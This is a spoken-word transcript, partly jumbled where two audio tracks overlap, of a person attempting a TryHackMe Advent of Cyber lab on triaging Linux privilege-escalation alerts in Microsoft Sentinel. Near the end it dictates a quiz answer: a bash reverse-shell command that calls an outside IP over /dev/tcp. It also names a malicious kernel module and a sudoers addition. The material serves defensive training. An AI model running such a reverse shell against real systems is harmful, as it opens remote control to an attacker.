All right, let's start day 10. I wanted to start here because this is kind of different for TryHacklMe. So we've got a lab environment. So once you're in instructions, you'll see this cloud details button. Then you need to click on, go ahead and click on that and then go back to credentials. And you're going to copy the username and you're going to go to the lab URL, which is this. And then you're going to log in with the credentials that they give you. So in my case, these are mine. My password. Temporary access pass. It's actually this. Yeah, it asked me to stay signed in. Okay, so now I'm in Azure. Great. So I don't know if I still need this, but I'm guessing I can come back to it if I still need to get back in. I deployed the lab and its rules, and now I'm ready to access my Azure account. I guess. So I'm in. Let's take a quick peek. Okay, this is all background information. Let's keep going and see if we can follow along here. Okay, so now we're going to go to Microsoft Sentinel. Microsoft. Does it say it yet? Microsoft. There's Microsoft Sentinel. So we'll click on that. And we're going to go to logs. Oh, wait. We're going to click over here. It says 1, 2, 3, right? So we're going to click on this Sentinel link here. And then we're going to go to logs. And then we're going to go to syscl. Whoa, I don't see that. Okay, home. Oh, darn it. Go back to Sentinel. Okay. I need to do something here that I don't know how to do. So where do we find? Then in your dedicated Sentinel, just go to the logs tab. I guess I'll head over to Azure portal and search for Sentinel. Then click on dedicated Sentinel instance. I guess I'm already in my dedicated Sentinel instance. I don't know. Looks fine to me. I don't have this. It says Microsoft Home Sentinel and it says name. Microsoft Home Sentinel. I think I'm already in. Okay, then logs and then syscl. So I'm supposed to be able to find something called general over here. Manage view? No, I'm not seeing any of that stuff on the left that it sees over there. No Microsoft Sentinel to display. You're viewing a new version browser experience. Go back to the old version. Okay, here's the old version. I don't see a Sentinel version here. If I click on new, I don't think that's what I want to do. What about here? Wow, I really don't see the same thing that they're seeing here. Sentinel. Then click on your dedicated Sentinel instance. Go to the logs tab. May I click on this dedicated log instance up here? No, that's not clickable. Is this clickable? Copy title, print, log. Wow, I don't know what I'm missing here. Go here. It's got these, and I can go here. I don't think that's it. What if I close this? Close this. Okay, I still want Sentinel. You're viewing a new version of the browser experience. Click here to view the old version. Okay, so this is the old version. Great. Edit columns. Resource groups. That's not very helpful. Default. Browse all views. There's default. refresh. It's really not very helpful. Okay, so when we run into those problems, we're gonna watch some of the videos.
Welcome to day 10 of
to see what's going on. Okay, we're loading.
Does expire in about 1, and this is the one that we want to select.
Microsoft Sentinel.
From here, we should have our own
Microsoft
Sentinel instance, and this right here is our.
Okay, I still don't see that Sentinel instance, so I'm guessing that's what's wrong. Maybe that still needs to run. Maybe I didn't do something down in here that I was supposed to do. Cloud details, actions, deploy lab. Okay, so maybe I never deployed the lab. And then I have to deploy the rules. Okay, so this is why I started recording now, because I already made this mistake, and I'm assuming other people are going to make this mistake too and try to go fast. Okay, so everything should be launched now. So now if I go back to Microsoft Sentinel, there it is. Oh boy, okay. Where we wanted to be, logs. I'm guessing we don't need this. Okay, let's go back to where we were here. We're gonna go here. Went to logs, and then when we started a new query, we went to tables. Do we have tables under logs? Okay, we've got all this stuff, so I'm gonna close that. And I'm gonna go to tables. Tables to view, none. Tables, custom logs. I do not see custom logs. We're trying to do a new query. New query, tables, custom logs. Runs a preview query. Let me guess. Did that launch correctly? I don't know. Oh boy. Alright, back to the video.
Dashboard. What we want to do here is click on Configuration and select Analytics. Now, under the Analytics tab, you might only see one rule, and that is okay.
Configuration, Analytics. This page was moved. Did I not do something I need to do again? Okay, let me go back here. So we deployed the rules and we deployed the lab, copied the lab URL. Maybe I need to copy the lab URL. Maybe it's different now. So let's paste. Now that looks the same. Yeah. I'm going to maybe later. Maybe we just needed time to do something. I don't know. Here's configuration. This looks different than it did before. I will say that. So I click on analytics and nothing's really happening. Watch list, analytics. This page was moved to Defender portal. Logs. I'm gonna close this. Open this. See, yeah, I had different stuff there a second ago. What the heck is going on? Okay,
and this is the one that we want to select. From here, we should have our own Microsoft Sentinel instance. And this right here is our dashboard. What we want to do here is click on Configuration and select Analytics. Now, under the Analytics,
I don't have anything there. This page is moved. Defender portal. Why would it tell us to go someplace else that's not covered in the video or in the instructions? This is like super confusing. Okay, so we don't have that. This looks a little bit better. A lot of these pages say they are moved to the Defender portal. I don't know why. Wow. We're gonna just refresh this. So now I got different stuff. Now I have, oh my gosh. I don't know if I'm not waiting long enough or what's going on, but this is kind of frustrating. Okay, now let's try logs. And close this again. Still nothing in here. All right.
Fix tab, you might only see one rule, and that is okay. All you need to do here is hit the refresh button, which is located at the top.
Okay, so we're gonna go back to analytics. Fucking now that's gone. Again. I don't know what's going on. This is so friggin' weird. Yeah, let's try refresh again. So now I have analytics, and he said go up here and hit click refresh. Still only one rule.
And if you wait about a minute or two, you should see a total of 8 or 9 rules. If you do not, I would recommend just waiting a little bit longer. But if you do see about 8 to 9 rules...
How long have I had this thing deployed? I mean, this is a lesson, I guess, is that it takes a very, very long time for this to boot up. And you're going to be sitting here wondering what you did wrong. And you did nothing wrong. 12 minutes into the video. And I still don't have more than the one rule. This is something else. The instructions say to be doing something else altogether. Click on Sentinel, go to logs, custom table. He said go to analytics and make sure that you have 9 there. We do not have 9. We have 1. And it's not getting any more. I have now checked the logs and enabled the rule set. No, we haven't gotten that far yet. Oh my gosh. I'm afraid to go over here because every time I go over here, it doesn't work. I don't see it. So let's go back to analytics, and now that's gone. Then I have to refresh again. I don't know if that's resetting everything or what. So that's what this guy did first. Once he went to analytics.
Rules, go ahead and select all of the rules by clicking on this checkbox, and then go ahead and click on Disable. Once that is disabled, go ahead and click on the checkbox again, and then click on Enable. What we are doing here is essentially forcing these rules to trigger. And I do want to note that you might get an error about being unable to enable some of these rules. And if you do see that, again, just wait about a minute, hit the refresh button, and enable the rules again. Over on the top right corner, we do see a notification or a bell icon. And if we click on the bell icon, this will display all of our notifications. So
okay, our bell has not been dinged. Wow, this is brutal. Okay, let's continue.
When we
Let's assume
disabled
that we
our
can watch
rules
this.
and when we enabled them as well.
15
If you get
minutes
any
now.
errors, you will see that right here. Before we move on, I do want to note the status column. So if you happen to see that one rule was not enabled, what you can do is go ahead and select that particular rule and enable it again. At the end of the day, you want to make sure that all of the rules are set to enabled. Before we start investigating these alerts in Microsoft Sentinel, we must step back and understand what is happening. When alerts start flooding in, jumping straight into each one isn't as efficient as it may sound, since not all alerts are created equal. Is refresh, and after refreshing the page, I get this. Select incidents. Now, you will likely see this page where it says, this
All the
page was
time.
moved to Defender Portal. Please connect your workspace to the Defender Portal. And if you do happen to see this page, all you need to do is refresh. And after refreshing the page, I get this screen right here where it says, welcome to Microsoft Azure. I'll go ahead and click on maybe later. And again, we are under the threat management incidents. Currently, I have 0 open incidents, and that is not what we want. So what I'll do here is wait for about a minute or two, and then click on the refresh button. Okay, it's been about 2 minutes, so let's go ahead and hit refresh. And we do have 1 incident now, but we should be expecting more. After waiting an additional 2 minutes, I'm going to hit the refresh button, and we still get 1 incident. Now, that is perfectly okay. What we can do instead is go back to our analytics. So if you click on configuration, head over to analytics, we get this page. So let's go ahead and refresh it. And then from here, we can confirm that all of the rules are currently enabled. And what I'll do is go ahead and disable these again.
So it's not working for him either. So here, and then he's just hitting refresh up here, I think. Yeah. Let's see, if we go to threat management, when we look at incidents, we won't see any. And we also see that this is blank, getting that same error. Hitting refresh, okay, we see no incidents found. So I guess what we could do to try to go a little faster here is you have to refresh all the time. My God, this is awful. This is not working like the way we want it to. So we can select this one and disable it. And then select this one and enable it. So now we do it with 1. Got this one thing here, right? So then we'll go to incidents, see if we have any incidents. So we can at least look at 1. No, we can't look at just 1. Wow. Okay, yeah. This is frustrating. Let's see what we can get through here. Because I'm assuming that we're going to have to do an investigation. We're going to have to like put in a flag at some point, but I don't know where we're going to get that. How many entities are affected by this alert? Okay, well, we can't see the alert. I don't know how long it's going to take before that shows up, but I'm pretty sure we've done all the things that we can do here. We have now waited about 18 minutes. Still only have this one thing here. And we've got nothing in incidents. No incidents found. We go to analytics. We had to refresh again. There's still only 1 rule active. What was this logs thing that it was asking us to do? Okay, every time I go to logs, it's putting me in this page. And I still don't see this custom thing that they were able to find on the instructions, and analytics isn't working. Not well, anyways. Still only 1. Oh boy. No incidents. I'm going to say this probably isn't working very well. I don't know how to get past this day. Let's see. So there's Linux. These are all the Linux ones, right? So there's 8 incidents for the Linux. How many entities are affected by it? I don't see that. Full details. This is 16. Incident number 16. Incident number 7. It's probably not going to show the number. Alerts 1, events 3, entities 3, but the number is 2 digits. So it's more than 10. Incident number 16, incident number 7. We got 3 on this. Really hard to tell how many machines are impacted by this. So I have all these alerts. What was it? What was the thing again? Pull kit exploit attempt. This one right here. So that's one alert. So we need to look at this alert, but I don't see it. Kernel. That's not the right. Well, no, it's not the right one. It's not the right alert. We need to look at a certain alert, and we can't see that alert. Navigate to Instance tab and look for an alert with that name. Yeah, that's not working. Instance tab, refresh. Yeah, no instance found. And the only rule we have, does that even apply to the Linux stuff? It's really advanced multi-stage attack detection. I don't think that's the one that we've got anyways. But we can disable and then re-enable and see if anything happens. I doubt very much anything will happen. I'm going to refresh again. Nope, nothing's happening. Refresh. One rule. Rule templates. We have all these templates. Am I looking in the wrong place? Incidents. Logs. So we never went to logs. This log preview. Because we couldn't get this to work. Sentinel logs. Logs. And we go to table. And then there's this custom logs, but I don't see this. Logs. I can get the tables, but I don't have this. Click Dedicated Instance, go to Logs, and then select Custom Logs Table. Okay. Let's just go back a little bit, because maybe there was something I missed here.
And we'll click on the Copy to Clipboard button, enable our Analytic 1 rule, and that is okay. All you need to do here is hit the refresh button, which is located at the top. And if you wait about a minute or two, you should see a total of 8 or 9 rules. If you do not, I would recommend just waiting a little bit longer. But if you do see about 8 to 9 rules, go ahead and select all of the rules by clicking on this.
Okay, that is so not helping. Yeah. The whole thing is like launched correctly. I think. Cloud details, join, actions, deploy lab, success. I'm going to leave the lab, close this window, and then refresh this page, maybe start again because I am not having any luck on this. Join the lab. Okay, actions, deploy the lab. "25 minutes in, no progress. No answers. Okay, so that's done. So we're going to copy the lab URL, try again, I'm going to paste it in here. Go ahead and go there. Our credentials, we're going to copy out this. Now it's logged me right back in. Never logged me out. I'm going to switch accounts because I don't want it to do that. Paste in this. Next. And then my temporary pass is this. Sign in. We're going to go to Microsoft Sentinel. There's Eastman. So far this is working much better than previously. We're going to go to Analytics. One active rule. Connectivity unknown. Evaluating issue. That's great. Let's wait and see if it gets better. Okay. I'm very impatient, especially for this. Oh, well, look at this. All kinds of errors and problems here. I don't have access, it's saying. This is so weird. Okay, then I'll sign out. And I will sign back in. Because you're saying I don't have access. That is not it. That's the lab. Okay, I want that. Uh-huh. Yeah, sure. Like that matters. And now I have the same problem. I don't have access. One rule. One rule. In the case the lab does not load, results in error, or do high volumes on Azure, please wait 30 minutes before retrying. You gotta be kidding me. Who has 30 minutes to wait when this happens all the time? Okay, so at the top here, we should be able to see success, success. We go to rule templates, there's all these other rules. Why aren't they launching? Okay, this guy's video is really not helping me. Let's try this video and see.
Hello everyone, my name is Oluchi Amadi and welcome and Triage alerts through Microsoft warnings. It was raining Triage and Paint, and it's coming up to your browser and open a new browser and paste it. Then go to your credentials to get the lab details, copy your username.
A lot of blurring here.
And if you check the top corner, you're going to see the lab environment. Then in case if you close it, you can still go back and see your login details. So once we are done with that, we are done with task 1. We have successfully deployed our lab environment. You click on check. Congratulations, you are done with task 1. Let's move to task 2, which is to set up our lab environment. Task 2 has to do with setting up our lab environment. This is how your Microsoft Azure account is going to look like. So let's go to our Microsoft Sentinel that we are going to be using for this challenge. Once you go to your Microsoft Sentinel, you can see that the next step is to go to your dedicated Sentinel instance, which is this is our dedicated Sentinel instance, and go to configurations. You go to configurations and go to analytics. And see, this is the alerts. So we need to disable it. And the reason why we have to disable it,
she goes and immediately has 9. Oh, boy. Yeah.
Welcome to day 2. Perfect. Now we have more than -kernel. And if I go ahead and expand this, it says kernel module insert on this particular incidence. For example, we get Linux privesc, cron job persistence. We have sudo shadow access, user added to sudo group, suid discovery, and that seems to be it. Now you might be wondering, why do these appear here? Well, this happens when one or more entities, so a host, a user, or IP address, appears in multiple incidents. And that's important because it's often a sign that these alerts aren't random or isolated, a bigger picture of an attacker. With that said, let's go ahead and start answering some of these questions. Question number 1, how many entities are affected by the Linux privesc polkit exploit attempt alert? Well, if we go back over to our Microsoft Sentinel, let's go ahead and click on the Microsoft Sentinel incident. And then the one that we are interested in is the polkit exploit attempt. Go ahead and click on that. And if we take a look at the entity section, we get...
Okay. So we're going to have to watch the video to do this because that's the only way to get it done. I cannot get this to work. Hopefully you can get it to work and follow those instructions better. But for me, it's just not working. I can only ever get one rule. Okay, let's keep going here.
10. And that is going to be our answer. Go ahead and type in 10. And we'll click on check.
This whole video is shorter
Perfect.
than the amount of time
What is
I've
the
been trying
severity
so far.
of the Linux privesc sudo shadow access alert? That is this one right here. And the severity over on the left-hand side is classified as high. Go ahead and type in high.
Oh boy. This is not the way that I like to do these because it's not working. I can't get it to work. And therefore I don't feel like I'm really learning because I can't go through these things step by step.
And check.
Next
Lastly,
question.
how many accounts were added to the sudoers group in the Linux privesc user added to sudo group alert? And that incident is this one right here. Taking a look at our severity, it is currently classified as medium. And if we take a look at the entities here, it says 15. So does that mean 15 users? Well, not necessarily. Let's go ahead and click on View Full Details. And under the overview, we do have an entities tab. What we can do here is go ahead and click on that. And then we have all of our entities, which should match up to 15. Taking a look at the type here, we have a host and we have an account. What we can do is click on the filter, uncheck all of them, and only select account. Click on apply, and now we have 4 accounts. Now, of course, we didn't really need to do that, but if you do happen to stumble upon an incident with a bunch of entities, this filter function is perfect. Going back over to our question.
4. All right. We're going to go down here, hit 4. No, that's the right answer. Deeper dive into the logs. Let's look at the questions here. What is the name of the kernel mode? Okay. We're going to have to watch the rest of the dude's video to find all of these answers because I still cannot get more than one active rule.
There were 4 accounts that were added. Awesome. Now that you have the hang of looking at the incidents, allow us to begin querying down the road. If we take a look at the field for backup well mode, by doing so, particular alert matches kernel for S and -02 will show us what I'll do. Just in case I need matches, there was this one we kind of already taken a look at. So the good thing here is that we saved the query previously. So I'll just select that and then click on run. And the one that we're interested in is the webserve-01. If we take a look at the message column, we can see that the kernel module insertion is this right here, malicious_mod.ko.
Malicious_mod.ko. This is going to be fun to type out. Killing me today, TryHacklMe.
Go ahead and right click, copy value, and paste that in. Next is, what is the unusual command executed within webserve-01 by the ops user? Well, since we know how to start crafting our own queries, we can simply replace app-02 with our web-serve-01, and then go ahead and run the query. We can take a look and see if there's any reference to the user called ops. And viewing this right here, I can see an event that contains the user ops. But let's just say we had, 1,000 messages. That's going to be very difficult to take a look one by one. What we can do instead is use something similar to the previous query at the top and say, and message has, surrounded in single quote, ops, and then go ahead and run that. And now we only get one event. This quickly helps us eliminate all of the other messages that do not contain the string ops. So the command of interest is right here.
Okay, that is really small. So I'm going to go ahead and open this up in a new tab. Oh, come on. It's not going to put me where I was? Okay, so we're at 20 minutes.
Welcome to day 10 of the Advent of Cyber.
You gotta be kidding me.
So the command of interest.
Okay, so it's command equals bin bash. The bin bash space -1 or space -I caret ampersand slash. This is so much fun. Caret ampersand slash. There's the slash dev TCP. Dev TCP 198.51 122 22, and I think it's 44444, and then 0 caret ampersand 1 0 caret ampersand 1. Oh my god, that was fun. Okay, next one, thank God, is just an IP address.
Rest is right here. Log in to storage-01. And I'll just put in the message as SSH. And run it again. Aha, so it was actually called SSH D instead of SSH. And we could see a successful SSH login coming from the IP address of
172.16.0.12. 172.16.0.12. What's the external IP address?
172 that successfully logged in as D. We get two events. And the question was looking for an external IP address.
So that's
the first one right here, 10.1.
10.1.5. 10.1. Oh. It's going to be the 203, actually.
1.5 is a private IP.
That's a private IP. Okay, got it. So it's the 203. 203 011345. 011325, did I say? No. 45. Okay, aside from the backup user, what is the name of the user added to Sedur's?
P, aka an internal IP. Backup user. What is the name of our query again? And let's take a look. So right here we have user mod deploy, and I believe that is it other than the backup user.
So let's try deploy. Finally finished. I don't know if you heard anything there because I was unable to deploy like we're supposed to according to the instructions. So either I did something wrong, which is very likely, or this thing is just slammed and therefore nothing's working correctly. Either way, I'll see you tomorrow.